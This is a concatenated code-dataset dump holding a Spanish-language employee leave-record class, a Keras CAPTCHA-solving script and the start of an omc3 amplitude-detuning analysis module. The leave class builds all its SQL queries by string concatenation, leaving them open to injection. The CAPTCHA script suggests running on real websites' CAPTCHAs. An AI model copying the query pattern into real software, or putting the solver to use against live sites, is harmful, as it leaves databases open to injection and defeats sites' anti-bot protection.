= str()\n\t_comentario = str()\n\t\n\tdef __init__(self, id_bbdd=0):\n\t\t\n\t\tif id_bbdd < 1:\n\t\t\treturn\n\t\t\n\t\tconsulta = \"SELECT id, id_empleado, desde, hasta, dias_tomados, tipo, comentario\\\n\t\t\t\t\tFROM licencia WHERE id = \" + str(id_bbdd)\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tresultset = Conexion.fetchone()\n\t\t\n\t\tConexion.cerrar()\n\t\t\n\t\tif resultset is None:\n\t\t\treturn\n\t\t\n\t\tself._id = resultset[0]\n\t\tself.id_empleado = resultset[1]\n\t\tself.desde = resultset[2]\n\t\tself.hasta = resultset[3]\n\t\tself.dias_tomados = resultset[4]\n\t\tself.tipo = resultset[5]\n\t\tself.comentario = resultset[6]\n\t\tself._cambios = False\n\t\tself._nuevo = False\n\t\n\t\"\"\"Inicio: Metodos estaticos\"\"\"\n\t\n\t@staticmethod\n\tdef licencia(id_empleado, desde, ):\n\t\t\n\t\tl = Licencia()\n\t\t\n\t\tconsulta = \"SELECT id, id_empleado, desde, hasta, dias_tomados, tipo, comentario\\\n\t\t\t\t\tFROM licencia WHERE id_empleado = \" + str(id_empleado) + \" AND desde = cast('\" + str(desde) + \"' as date)\"\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tresultset = Conexion.fetchone()\n\t\t\n\t\tConexion.cerrar()\n\t\t\n\t\tif resultset is None:\n\t\t\treturn\n\t\t\n\t\tl._id = resultset[0]\n\t\tl.id_empleado = resultset[1]\n\t\tl.desde = resultset[2]\n\t\tl.hasta = resultset[3]\n\t\tl.dias_tomados = resultset[4]\n\t\tl.tipo = resultset[5]\n\t\tl.comentario = resultset[6]\n\t\tl._cambios = False\n\t\tl._nuevo = False\n\t\t\n\t\treturn l\n\t\n\t@staticmethod\n\tdef de_empleado(id_empleado, tipo=\"\"):\n\t\t\n\t\tif id_empleado < 1:\n\t\t\treturn\n\t\t\n\t\tif tipo != \"\":\n\t\t\tconsulta = \"SELECT id FROM licencia WHERE tipo = '\" + str(tipo) + \"' AND id_empleado = \" + str(id_empleado) + \" ORDER BY desde DESC\"\n\t\telse:\n\t\t\tconsulta = \"SELECT id FROM licencia WHERE id_empleado = \" + str(id_empleado) + \" ORDER BY desde DESC\"\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tresultset = Conexion.fetchall()\n\t\t\n\t\tConexion.cerrar()\n\t\t\n\t\tls = []\n\t\t\n\t\tfor datos in resultset:\n\t\t\t\n\t\t\tl = Licencia(datos[0])\n\t\t\t\n\t\t\tls.append(l)\n\t\t\t\n\t\treturn ls\n\t\n\t@staticmethod\n\tdef licencias():\n\t\t\n\t\tls = []\n\t\t\n\t\tconsulta = \"SELECT id FROM licencia\"\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tresultset = Conexion.fetchall()\n\t\t\n\t\tConexion.cerrar()\n\t\t\n\t\tfor datos in resultset:\n\t\t\t\n\t\t\tl = Licencia(datos[0])\n\t\t\t\n\t\t\tls.append(l)\n\t\t\n\t\treturn ls\n\t\n\t\"\"\"Fin: Metodos estaticos\"\"\"\n\t\n\tdef guardar(self, ):\n\t\t\n\t\tif not self._cambios:\n\t\t\treturn\n\t\t\n\t\tif self.id_empleado == 0:\n\t\t\traise Exception(\"El empleado no es válido.\")\n\t\t\n\t\tif self.desde == \"\":\n\t\t\traise Exception(\"La fecha desde no es válida.\")\n\t\t\n\t\tif self.hasta == \"\":\n\t\t\traise Exception(\"La fecha hasta no es válida.\")\n\t\t\n\t\tif self.dias_tomados < 1:\n\t\t\traise Exception(\"Las fechas no son válidas.\")\n\t\t\n\t\tif self.tipo == \"\":\n\t\t\traise Exception(\"El tipo de licencia no es válido.\")\n\t\t\n\t\tif self._id_empleado == 0:\n\t\t\traise Exception(\"El empleado no es válido.\")\n\t\t\n\t\tdic = {\"a1\" : \"id_empleado\", \n\t\t\t\t\"a2\" : \"desde\", \n\t\t\t\t\"a3\" : \"hasta\", \n\t\t\t\t\"a4\" : \"dias_tomados\", \n\t\t\t\t\"a5\" : \"tipo\", \n\t\t\t\t\"a6\" : \"comentario\", \n\t\t\t\t}\n\t\t\n\t\tvals = {\"v1\" : self.id_empleado, \n\t\t\t\t\"v2\" : self.desde, \n\t\t\t\t\"v3\" : self.hasta, \n\t\t\t\t\"v4\" : self.dias_tomados, \n\t\t\t\t\"v5\" : 
self.tipo, \n\t\t\t\t\"v6\" : self.comentario, \n\t\t\t\t}\n\t\t\n\t\t#VALIDO QUE EXISTA EL EMPLEADO\n\t\tconsulta = \"SELECT id FROM empleado WHERE id = \" + str(self.id_empleado)\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tresultset = Conexion.fetchone()\n\t\t\n\t\tConexion.cerrar()\n\t\t\n\t\tif resultset is None:\n\t\t\traise Exception(\"El empleado no es válido.\")\n\t\t\n\t\t#VALIDO QUE NO EXISTA UNA LICENCIA EN EL MISMO PERIODO DE TIEMPO\n\t\tconsulta = \"SELECT id FROM licencia \" +\\\n\t\t\t\t\t\"WHERE (desde <= cast('\" + str(self.desde) + \"' as date) AND hasta >= cast('\" + str(self.desde) + \"' as date) \" + \\\n\t\t\t\t\t\"OR desde <= cast('\" + str(self.hasta) + \"' as date) AND hasta >= cast('\" + str(self.hasta) + \"' as date) \" +\\\n\t\t\t\t\t\"OR desde >= cast('\" + str(self.desde) + \"' as date) AND hasta <= cast('\" + str(self.hasta) + \"' as date)) \" +\\\n\t\t\t\t\t\"AND id != \" + str(self.id) +\\\n\t\t\t\t\t\" AND id_empleado = \" + str(self.id_empleado)\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tresultset = Conexion.fetchone()\n\t\t\n\t\tConexion.cerrar()\n\t\t\n\t\tif resultset is not None:\n\t\t\traise Exception(\"El empleado ya se está tomando una licencia en esta fecha.\")\n\t\t\n\t\tif self.tipo == \"58\":\n\t\t\t\n\t\t\tif self.dias_tomados > 1:\n\t\t\t\traise Exception(\"La cantidad de días no es válida para una licencia de tipo 58.\")\n\t\t\t\n\t\t\tls = Licencia.de_empleado(self.id_empleado, \"58\")\n\t\t\t\n\t\t\tcant_por_anio = 0\n\t\t\tfor l in ls:\n\t\t\t\tanio = l.desde.split('/')[2]\n\t\t\t\tif anio == self.desde.split('/')[2] and l.id != self.id:\n\t\t\t\t\tcant_por_anio = cant_por_anio + 1\n\t\t\t\n\t\t\tif cant_por_anio >= 6:\n\t\t\t\traise Exception(\"El empleado ya se tomó 6 artículos 58 este año.\")\n\t\t\t\n\t\t\tcant_por_mes = 0\n\t\t\tfor l in ls:\n\t\t\t\tmes = l.desde.split('/')[1]\n\t\t\t\tif mes == self.desde.split('/')[1] and l.id != self.id:\n\t\t\t\t\tcant_por_mes = cant_por_mes + 1\n\t\t\t\n\t\t\tif cant_por_mes >= 2:\n\t\t\t\traise Exception(\"El empleado ya se tomó 2 artículos 58 este mes.\")\n\t\t\n\t\tif self._nuevo:\n\t\t\t\n\t\t\tconsulta = \"INSERT INTO licencia('a1', 'a2', 'a3', 'a4', 'a5', 'a6')\\\n\t\t\t\t\t\tVALUES('v1', 'v2', 'v3', 'v4', 'v5', 'v6') RETURNING id\"\n\t\t\t\n\t\t\tfor i in range(1, 7):\n\t\t\t\t\n\t\t\t\tif vals[\"v\" + str(i)]:\n\t\t\t\t\t\n\t\t\t\t\tconsulta = consulta.replace(\"'a\" + str(i) + \"'\", str(dic[\"a\" + str(i)]))\n\t\t\t\t\t\n\t\t\t\t\tif isinstance(vals[\"v\" + str(i)], int):\n\t\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"'\", str(vals[\"v\" + str(i)]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tif '/' in str(vals[\"v\" + str(i)]):\n\t\t\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"'\", \"cast('\" + str(vals[\"v\" + str(i)]) + \"' as date)\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"'\", \"'\" + str(vals[\"v\" + str(i)]) + \"'\")\n\t\t\t\telse:\n\t\t\t\t\tif \"'v\" + str(i) + \"', \" in consulta:\n\t\t\t\t\t\tconsulta = consulta.replace(\"'a\" + str(i) + \"', \", \"\")\n\t\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"', \", \"\")\n\t\t\t\t\telif \", \" + \"'v\" + str(i) + \"')\" in consulta:\n\t\t\t\t\t\tconsulta = consulta.replace(\", \" + \"'a\" + str(i) + \"'\", \"\")\n\t\t\t\t\t\tconsulta = consulta.replace(\", \" + \"'v\" + str(i) + \"'\", \"\")\n\t\t\t\n\t\telse:\n\t\t\t\n\t\t\tconsulta = \"SELECT id FROM licencia WHERE desde = cast('\" + str(self.desde) + \"' as date) AND id_empleado = \" + 
str(self.id_empleado)\n\t\t\t\n\t\t\tConexion.ejecutar(consulta)\n\t\t\t\n\t\t\tresultset = Conexion.fetchone()\n\t\t\t\n\t\t\tConexion.cerrar()\n\t\t\t\n\t\t\tif resultset is not None:\n\t\t\t\tfor id_bbdd in resultset:\n\t\t\t\t\tif id_bbdd != self.id:\n\t\t\t\t\t\traise Exception(\"Ya existe esta licencia para este empleado.\")\n\t\t\t\n\t\t\tconsulta = \"UPDATE licencia SET 'a1' = 'v1',\\\n\t\t\t\t\t\t\t\t\t\t\t'a2' = 'v2',\\\n\t\t\t\t\t\t\t\t\t\t\t'a3' = 'v3',\\\n\t\t\t\t\t\t\t\t\t\t\t'a4' = 'v4',\\\n\t\t\t\t\t\t\t\t\t\t\t'a5' = 'v5',\\\n\t\t\t\t\t\t\t\t\t\t\t'a6' = 'v6'\\\n\t\t\t\t\t\t\t\t\t\t\tWHERE id = \" + str(self.id)\n\t\t\t\n\t\t\tfor i in range(1, 7):\n\t\t\t\t\n\t\t\t\tconsulta = consulta.replace(\"'a\" + str(i) + \"'\", str(dic[\"a\" + str(i)]))\n\t\t\t\t\n\t\t\t\tif isinstance(vals[\"v\" + str(i)], int) or isinstance(vals[\"v\" + str(i)], float):\n\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"'\", str(vals[\"v\" + str(i)]))\n\t\t\t\telse:\n\t\t\t\t\tif '/' in str(vals[\"v\" + str(i)]):\n\t\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"'\", \"cast('\" + str(vals[\"v\" + str(i)]) + \"' as date)\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"'\", \"'\" + str(vals[\"v\" + str(i)]) + \"'\")\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tif self._nuevo:\n\t\t\tself._id = Conexion.fetchone()[0]\n\t\t\tself._nuevo = False\n\t\t\tself._cambios = False\n\t\t\n\t\tConexion.cerrar()\n\t\n\tdef eliminar(self, ):\n\t\t\n\t\tif self._nuevo:\n\t\t\treturn\n\t\t\n\t\tif self.id == 0:\n\t\t\treturn\n\t\t\n\t\tconsulta = \"DELETE FROM licencia WHERE id = \" + str(self.id)\n\t\tConexion.ejecutar(consulta)\n\t\tConexion.cerrar()\n\t\t\n\t\tself._nuevo = True\n\t\tself._cambios = True\n\t\n\t\"\"\"Inicio: Getters y Setters\"\"\"\n\t\n\t@property\n\tdef id(self):\n\t\treturn self._id\n\t\n\t@property\n\tdef id_empleado(self):\n\t\treturn self._id_empleado\n\t\n\t@id_empleado.setter\n\tdef id_empleado(self, id_empleado):\n\t\t\n\t\ttry:\n\t\t\tid_empleado = int(id_empleado)\n\t\t\t\n\t\t\tif id_empleado < 1:\n\t\t\t\traise ValueError\n\t\t\t\n\t\texcept ValueError:\n\t\t\traise Exception(\"El empleado no es válido.\")\n\t\t\n\t\tif self._id_empleado != id_empleado:\n\t\t\tself._id_empleado = id_empleado\n\t\t\tself._cambios = True\n\t\n\t@property\n\tdef desde(self):\n\t\treturn self._desde\n\t\n\t@desde.setter\n\tdef desde(self, desde):\n\t\t\n\t\tdesde = str(desde)\n\t\t\n\t\tdia = \"\"\n\t\tmes = \"\"\n\t\tanio = \"\"\n\t\t\n\t\tif \"/\" in desde:\n\t\t\tdia, mes, anio = desde.split('/')\n\t\telif \"-\" in desde:\n\t\t\tanio, mes, dia = desde.split('-')\n\t\telse:\n\t\t\traise Exception(\"La fecha desde posee un formato no válido.\")\n\t\t\n\t\tdia = int(dia)\n\t\tmes = int(mes)\n\t\tanio = int(anio)\n\t\t\n\t\ttry:\n\t\t\tdatetime(anio, mes, dia)\n\t\texcept ValueError:\n\t\t\traise Exception(\"La fecha desde no es válida.\")\n\t\t\n\t\tdia = str(dia)\n\t\tmes = str(mes)\n\t\tanio = str(anio)\n\t\t\n\t\tif self._desde != dia + \"/\" + mes + \"/\" + anio:\n\t\t\tself._desde = dia + \"/\" + mes + \"/\" + anio\n\t\t\tself._cambios = True\n\t\t\n\t\tif self._hasta != \"\":\n\t\t\t\n\t\t\tddia, dmes, danio = str(self._desde).split('/')\n\t\t\thdia, hmes, hanio = str(self._hasta).split('/')\n\t\t\t\n\t\t\tcomp_desde = datetime(int(danio), int(dmes), int(ddia))\n\t\t\tcomp_hasta = datetime(int(hanio), int(hmes), int(hdia))\n\t\t\t\n\t\t\tif ((comp_hasta - comp_desde).days + 1) < 1:\n\t\t\t\tself._hasta = 
\"\"\n\t\t\t\treturn\n\t\t\t\n\t\t\tself.dias_tomados = (comp_hasta - comp_desde).days + 1\n\t\t\t\n\t\n\t@property\n\tdef hasta(self):\n\t\treturn self._hasta\n\t\n\t@hasta.setter\n\tdef hasta(self, hasta):\n\t\t\n\t\thasta = str(hasta)\n\t\t\n\t\tdia = \"\"\n\t\tmes = \"\"\n\t\tanio = \"\"\n\t\t\n\t\tif \"/\" in hasta:\n\t\t\tdia, mes, anio = hasta.split('/')\n\t\telif \"-\" in hasta:\n\t\t\tanio, mes, dia = hasta.split('-')\n\t\telse:\n\t\t\traise Exception(\"La fecha hasta posee un formato no válido.\")\n\t\t\n\t\tdia = int(dia)\n\t\tmes = int(mes)\n\t\tanio = int(anio)\n\t\t\n\t\ttry:\n\t\t\tdatetime(anio, mes, dia)\n\t\texcept ValueError:\n\t\t\traise Exception(\"La fecha hasta no es válida.\")\n\t\t\n\t\tdia = str(dia)\n\t\tmes = str(mes)\n\t\tanio = str(anio)\n\t\t\n\t\tif self._hasta != dia + \"/\" + mes + \"/\" + anio:\n\t\t\tself._hasta = dia + \"/\" + mes + \"/\" + anio\n\t\t\tself._cambios = True\n\t\t\n\t\tif self._desde != \"\":\n\t\t\t\n\t\t\tddia, dmes, danio = str(self._desde).split('/')\n\t\t\thdia, hmes, hanio = str(self._hasta).split('/')\n\t\t\t\n\t\t\tcomp_desde = datetime(int(danio), int(dmes), int(ddia))\n\t\t\tcomp_hasta = datetime(int(hanio), int(hmes), int(hdia))\n\t\t\t\n\t\t\tif ((comp_hasta - comp_desde).days + 1) < 1:\n\t\t\t\tself._desde = \"\"\n\t\t\t\treturn\n\t\t\t\n\t\t\tself.dias_tomados = (comp_hasta - comp_desde).days + 1\n\t\n\t@property\n\tdef dias_tomados(self):\n\t\treturn self._dias_tomados\n\t\n\t@dias_tomados.setter\n\tdef dias_tomados(self, dias_tomados):\n\t\t\n\t\ttry:\n\t\t\tdias_tomados = int(dias_tomados)\n\t\t\t\n\t\t\tif dias_tomados < 1:\n\t\t\t\traise ValueError\n\t\t\t\n\t\texcept ValueError:\n\t\t\traise Exception(\"La cantidad de días no es válida.\")\n\t\t\n\t\tif self._dias_tomados != dias_tomados:\n\t\t\tself._dias_tomados = dias_tomados\n\t\t\tself._cambios = True\n\t\n\t@property\n\tdef tipo(self):\n\t\treturn self._tipo\n\t\n\t@tipo.setter\n\tdef tipo(self, tipo):\n\t\t\n\t\tif tipo is None or (isinstance(tipo, str) and tipo == \"\"):\n\t\t\traise Exception(\"El tipo de licencia es un campo requerido.\")\n\t\t\n\t\ttipo = tipo.capitalize()\n\t\t\n\t\ttipos = ['18',\\\n\t\t\t\t\t'3',\\\n\t\t\t\t\t'53',\\\n\t\t\t\t\t'58',\\\n\t\t\t\t\t'Comisión',\\\n\t\t\t\t\t'Enfermedad',\\\n\t\t\t\t\t'Franco',\\\n\t\t\t\t\t'Otro']\n\t\t\n\t\tif tipo not in tipos:\n\t\t\traise Exception(\"El tipo de licencia no es válido.\")\n\t\t\n\t\tif self._tipo != tipo:\n\t\t\tself._tipo = tipo\n\t\t\tself._cambios = True\n\t\n\t@property\n\tdef comentario(self):\n\t\treturn self._comentario\n\t\n\t@comentario.setter\n\tdef comentario(self, comentario):\n\t\t\n\t\tif comentario is None:\n\t\t\treturn\n\t\t\n\t\tif self._comentario == comentario:\n\t\t\treturn\n\t\t\n\t\tcomentario.replace(';', ',')\n\t\t\n\t\tself._comentario = comentario\n\t\tself._cambios = True\n\t\n\t\"\"\"Fin: Getters y Setters\"\"\"\n","sub_path":"m/licencia.py","file_name":"licencia.py","file_ext":"py","file_size_in_byte":11665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"630908813","text":"from keras.models import load_model\nfrom imutils import paths\nimport numpy as np\nimport imutils\nfrom cv2 import cv2\nimport pickle\nfrom extractChar import pad_image\nimport os\n\n\n\nMODEL_FILENAME = \"captcha_model.hdf5\"\nMODEL_LABELS_FILENAME = \"model_labels.dat\"\nCAPTCHA_IMAGE_FOLDER = \"test1\"\n\n\n# Load up the model labels (so we can translate model predictions to actual letters)\nwith open(MODEL_LABELS_FILENAME, \"rb\") 
as f:\n lb = pickle.load(f)\n\n# Load the trained neural network\nmodel = load_model(MODEL_FILENAME)\n\n# Grab some random CAPTCHA images to test against.\n# In the real world, you'd replace this section with code to grab a real\n# CAPTCHA image from a live website.\ncaptcha_image_files = list(paths.list_images(CAPTCHA_IMAGE_FOLDER))\n# captcha_image_files = np.random.choice(\n# captcha_image_files, size=(3,), replace=False)\n\n# loop over the image paths\nfor image_file in captcha_image_files:\n # Load the image and convert it to grayscale\n print(image_file)\n image = cv2.imread(image_file)\n # image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n image = cv2.imread(image_file)\n\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n low = np.array([0, 100, 250])\n high = np.array([179, 255, 255])\n mask_fore = cv2.inRange(hsv, low, high)\n mask_back = cv2.bitwise_not(mask_fore)\n\n kernel = np.ones((11, 11), np.float32)/121\n fltr1_f_dil = cv2.dilate(mask_fore, kernel, iterations=1)\n fltr1_f_bor = cv2.bitwise_and(mask_back, mask_back, mask=fltr1_f_dil)\n\n contours, hierarchy = cv2.findContours(\n fltr1_f_bor, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contours = sorted(contours, key=lambda ctr: cv2.boundingRect(ctr)[0])\n\n # save_path = os.path.join(os.getcwd(), OUTPUT_FOLDER)\n # if not os.path.exists(save_path):\n # os.makedirs(save_path)\n # for cnt, letter in zip(contours, captcha_correct_text):\n # save_path = os.path.join(OUTPUT_FOLDER, letter)\n # if not os.path.exists(save_path):\n # os.makedirs(save_path)\n # x, y, w, h = cv2.boundingRect(cnt)\n # if w > 50 and h > 50:\n # count = counts.get(letter, 1)\n # p = os.path.join(save_path, \"{}.png\".format(str(count).zfill(6)))\n # cv2.imwrite(p, pad_image(fltr1_f_bor[y:y+h, x:x+w]))\n # counts[letter] = count + 1\n # letter_image_regions = []\n\n predictions = []\n\n # loop over the letters\n count = 0\n for cnt in contours:\n x, y, w, h = cv2.boundingRect(cnt)\n im = pad_image(fltr1_f_bor[y:y+h, x:x+w])\n thresh = 127\n im = cv2.threshold(im, thresh, 255, cv2.THRESH_BINARY)[1]\n im = np.expand_dims(im, axis=2)\n im = np.expand_dims(im, axis=0)\n prediction = model.predict(im)\n\n # Convert the one-hot-encoded prediction back to a normal letter\n letter = lb.inverse_transform(prediction)[0]\n predictions.append(letter)\n captcha_text = \"\".join(predictions)\n print(\"CAPTCHA text is: {}\".format(captcha_text))\n\n # Show the annotated image\n # cv2.imshow(\"Output\", output)\n # cv2.waitKey()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"502817553","text":"\"\"\"\nAmplitude Detuning Analysis\n---------------------------\n\nEntrypoint for amplitude detuning analysis.\n\nThis module provides functionality to run amplitude detuning analysis with additionally getting\nBBQ data from timber, averaging and filtering this data and subtracting it from the measurement\ndata.\n\nFurthermore, the orthogonal distance regression is utilized to get a linear or quadratic fit from\nthe measurements.\n\n\n**Arguments:**\n\n*--Required--*\n\n- **beam** *(int)*:\n\n Which beam to use.\n\n\n- **kick** *(PathOrStr)*:\n\n Location of the kick files (parent folder).\n\n\n- **plane** *(str)*:\n\n Plane of the kicks. 'X' or 'Y' or 'XY'.\n\n choices: ``['X', 'Y', 'XY']``\n\n\n*--Optional--*\n\n- **bbq_filtering_method** *(str)*:\n\n Filtering method for the bbq to use. 
'cut' cuts around a given tune,\n 'minmax' lets you specify the limits and 'outliers' uses the outlier\n filtering from utils.\n\n choices: ``['cut', 'minmax', 'outliers']``\n\n default: ``outliers``\n\n\n- **bbq_in** *(UnionPathStrInt)*:\n\n Fill number of desired data to extract from timber or path to presaved\n bbq-tfs-file. Use the string 'kick' to use the timestamps in the\n kickfile for timber extraction. Not giving this parameter skips bbq\n compensation.\n\n\n- **detuning_order** *(int)*:\n\n Order of the detuning as int. Basically just the order of the applied\n fit.\n\n default: ``1``\n\n\n- **fine_cut** *(float)*:\n\n Cut, i.e. tolerance, of the tune (fine cleaning for 'minmax' or\n 'cut').\n\n\n- **fine_window** *(int)*:\n\n Length of the moving average window, i.e the number of data points\n (fine cleaning for 'minmax' or 'cut').\n\n\n- **label** *(str)*:\n\n Label to identify this run.\n\n\n- **outlier_limit** *(float)*:\n\n Limit, i.e. cut, on outliers (Method 'outliers')\n\n default: ``0.0002``\n\n\n- **output** *(PathOrStr)*:\n\n Output directory for the modified kickfile and bbq data.\n\n\n- **tune_cut** *(float)*:\n\n Cuts for the tune. For BBQ cleaning (Method 'cut').\n\n\n- **tunes** *(float)*:\n\n Tunes for BBQ cleaning (Method 'cut').\n\n\n- **tunes_minmax** *(float)*:\n\n Tunes minima and maxima in the order x_min, x_max, y_min, y_max. For\n BBQ cleaning (Method 'minmax').\n\n\n- **window_length** *(int)*:\n\n Length of the moving average window. (# data points)\n\n default: ``20``\n\n\n\"\"\"\nfrom datetime import timedelta\nfrom pathlib import Path\nfrom typing import List, Sequence, Tuple, Dict, Any, Union\n\nimport numpy as np\nimport tfs\nfrom generic_parser import DotDict\nfrom generic_parser.entrypoint_parser import EntryPointParameters, entrypoint\nfrom numpy.typing import ArrayLike\nfrom tfs.frame import TfsDataFrame\n\nfrom omc3.definitions.constants import PLANES\nfrom omc3.tune_analysis import fitting_tools, kick_file_modifiers, timber_extract\nfrom omc3.tune_analysis.bbq_tools import OutlierFilterOpt, MinMaxFilterOpt, FilterOpts\nfrom omc3.tune_analysis.constants import (\n get_bbq_col,\n get_bbq_out_name,\n get_kick_out_name,\n get_timber_bbq_key,\n get_natq_err_col,\n INPUT_KICK, INPUT_PREVIOUS, CORRECTED,\n)\nfrom omc3.tune_analysis.kick_file_modifiers import (\n read_timed_dataframe,\n read_two_kick_files_from_folder,\n write_timed_dataframe, AmpDetData,\n)\nfrom omc3.utils.iotools import PathOrStr, UnionPathStrInt, save_config\nfrom omc3.utils.logging_tools import get_logger, list2str\nfrom omc3.utils.time_tools import CERNDatetime\n\n# Globals ----------------------------------------------------------------------\n\nDTIME: int = 120 # extra seconds to add to kick times window when extracting from timber\n\nLOG = get_logger(__name__)\n\nFILTER_OPTS = dict(\n cut=(\"window_length\", \"tunes\", \"tune_cut\"), # \"fine_window\", \"fine_cut\"\n minmax=(\"window_length\", \"tunes_minmax\", ), # \"fine_window\", \"fine_cut\"\n outliers=(\"window_length\", \"outlier_limit\"),\n)\n\n\n# Get Parameters ---------------------------------------------------------------\n\n\ndef _get_params():\n return EntryPointParameters(\n beam=dict(\n help=\"Which beam to use.\",\n required=True,\n type=int,\n ),\n kick=dict(\n help=\"Location of the kick files (parent folder).\",\n type=PathOrStr,\n required=True,\n ),\n plane=dict(\n help=\"Plane of the kicks. 
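Editor's note: an illustrative sketch (names and details assumed, not omc3's actual bbq_tools implementation) of the idea behind the 'outliers' filtering method and the window_length / outlier_limit options described above: smooth the BBQ tune with a moving average, then drop points that stray too far from it.

import numpy as np

def clean_outliers(values, window=20, limit=2e-4):
    # edge-corrected moving average, then mask points straying beyond the limit
    kernel = np.ones(window)
    weight = np.convolve(np.ones_like(values), kernel, mode="same")
    mavg = np.convolve(values, kernel, mode="same") / weight
    return np.where(np.abs(values - mavg) < limit, values, np.nan)

tune = 0.31 + 1e-5 * np.random.randn(200)
tune[50] += 1e-3                     # a glitch well beyond the 2e-4 limit
assert np.isnan(clean_outliers(tune)[50])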
'X' or 'Y' or 'XY'.\",\n required=True,\n choices=list(PLANES) + [\"\".join(PLANES)],\n type=str,\n ),\n label=dict(\n help=\"Label to identify this run.\",\n type=str,\n ),\n bbq_in=dict(\n help=\"Fill number of desired data to extract from timber or path to presaved bbq-tfs-file. \"\n f\"Use the string '{INPUT_KICK}' to use the timestamps in the kickfile for timber extraction. \"\n f\"Use the string '{INPUT_PREVIOUS}' to look for the modified ampdet kick-file from a previous run. \"\n \"Not giving this parameter skips bbq compensation.\",\n type=UnionPathStrInt\n ),\n detuning_order=dict(\n help=\"Order of the detuning as int. Basically just the order of the applied fit.\",\n type=int,\n default=1,\n ),\n output=dict(\n help=\"Output directory for the modified kickfile and bbq data.\",\n type=PathOrStr,\n ),\n window_length=dict(\n help=\"Length of the moving average window. (# data points)\",\n type=int,\n default=20,\n ),\n bbq_filtering_method=dict(\n help=\"Filtering method for the bbq to use. 'cut' cuts around a given tune, 'minmax' lets you \"\n \"specify the limits and 'outliers' uses the outlier filtering from utils.\",\n type=str,\n choices=list(FILTER_OPTS.keys()),\n default=\"outliers\",\n ),\n # Filtering method outliers\n outlier_limit=dict(\n help=\"Limit, i.e. cut, on outliers (Method 'outliers')\",\n type=float,\n default=2e-4,\n ),\n # Filtering method tune-cut\n tunes=dict(\n help=\"Tunes for BBQ cleaning (Method 'cut').\",\n type=float,\n nargs=2,\n ),\n tune_cut=dict(\n help=\"Cuts for the tune. For BBQ cleaning (Method 'cut').\",\n type=float,\n ),\n # Filtering method tune-minmax\n tunes_minmax=dict(\n help=\"Tunes minima and maxima in the order x_min, x_max, y_min, y_max. \"\n \"For BBQ cleaning (Method 'minmax').\",\n type=float,\n nargs=4,\n ),\n # Fine Cleaning\n fine_window=dict(\n help=\"Length of the moving average window, i.e the number of data points \"\n \"(fine cleaning for 'minmax' or 'cut').\",\n type=int,\n ),\n fine_cut=dict(\n help=\"Cut, i.e. 
tolerance, of the tune (fine cleaning for 'minmax' or 'cut').\",\n type=float,\n ),\n )\n\n\n# Main -------------------------------------------------------------------------\n\n\n@entrypoint(_get_params(), strict=True)\ndef analyse_with_bbq_corrections(opt: DotDict) -> Tuple[TfsDataFrame, TfsDataFrame]:\n \"\"\"\n Create amplitude detuning analysis with BBQ correction from timber data.\n\n Returns:\n The amplitude detuning analysis results as a TfsDataFrame and the BBQ data as a TfsDataFrame.\n \"\"\"\n LOG.info(\"Starting Amplitude Detuning Analysis\")\n _save_options(opt)\n\n opt, filter_opt = _check_analyse_opt(opt)\n kick_df, bbq_df = get_kick_and_bbq_df(kick=opt.kick, bbq_in=opt.bbq_in,\n beam=opt.beam,\n filter_opt=filter_opt)\n\n kick_plane = opt.plane\n\n for corrected in [False] + _should_do_corrected(kick_df, opt.bbq_in):\n if kick_plane in PLANES:\n kick_df = single_action_analysis(kick_df, kick_plane, opt.detuning_order, corrected)\n else:\n kick_df = double_action_analysis(kick_df, opt.detuning_order, corrected)\n\n if opt.output:\n _write_dataframes(opt.output, kick_df, bbq_df)\n return kick_df, bbq_df\n\n\ndef get_kick_and_bbq_df(kick: Union[Path, str], bbq_in: Union[Path, str],\n beam: int = None,\n filter_opt: FilterOpts = None,\n ) -> Tuple[tfs.TfsDataFrame, tfs.TfsDataFrame]:\n \"\"\"Load the input data.\"\"\"\n bbq_df = None\n if bbq_in is not None and bbq_in == INPUT_PREVIOUS:\n # NOTE: this is not the same as the \"previous BBQ data\" option in the GUI.\n # That one just uses the previous bbq_ampdet.tfs file (loaded in the \"else\" below).\n # The use-case for the INPUT_PREVIOUS option here is,\n # that you can modify the kick_ampdet_xy file manually (e.g. removing kicks)\n # and run the fitting on the new data again,\n # without having to touch the whole BBQ stuff again (as the values are already in the file).\n # Tips:\n # - Remove full columns to get rid of the whole kick\n # - Add NaNs into NATQ columns you want to ignore (in case you want to keep the other plane for this kick)\n # - Add NaNs to the ERRNATQ columns if you want to plot the point (w/o error bars) but not use it for fit\n LOG.debug(\"Getting data from previous ampdet kick file\")\n kick_df = read_timed_dataframe(Path(kick) / get_kick_out_name())\n kick_df.headers = {k: v for k, v in kick_df.headers.items() if not k.startswith(\"ODR_\")}\n\n # redo the corrected columns, so you only need to add NaNs into the NATQ columns\n LOG.debug(\"Adding corrected natural tunes and stdev to kick data\")\n kick_df = kick_file_modifiers.add_corrected_natural_tunes(kick_df)\n else:\n LOG.debug(\"Getting data from kick files\")\n kick_df = read_two_kick_files_from_folder(kick)\n\n if bbq_in is not None:\n bbq_df = _get_bbq_data(beam, bbq_in, kick_df)\n\n LOG.debug(\"Adding moving average data to kick data\")\n kick_df, bbq_df = 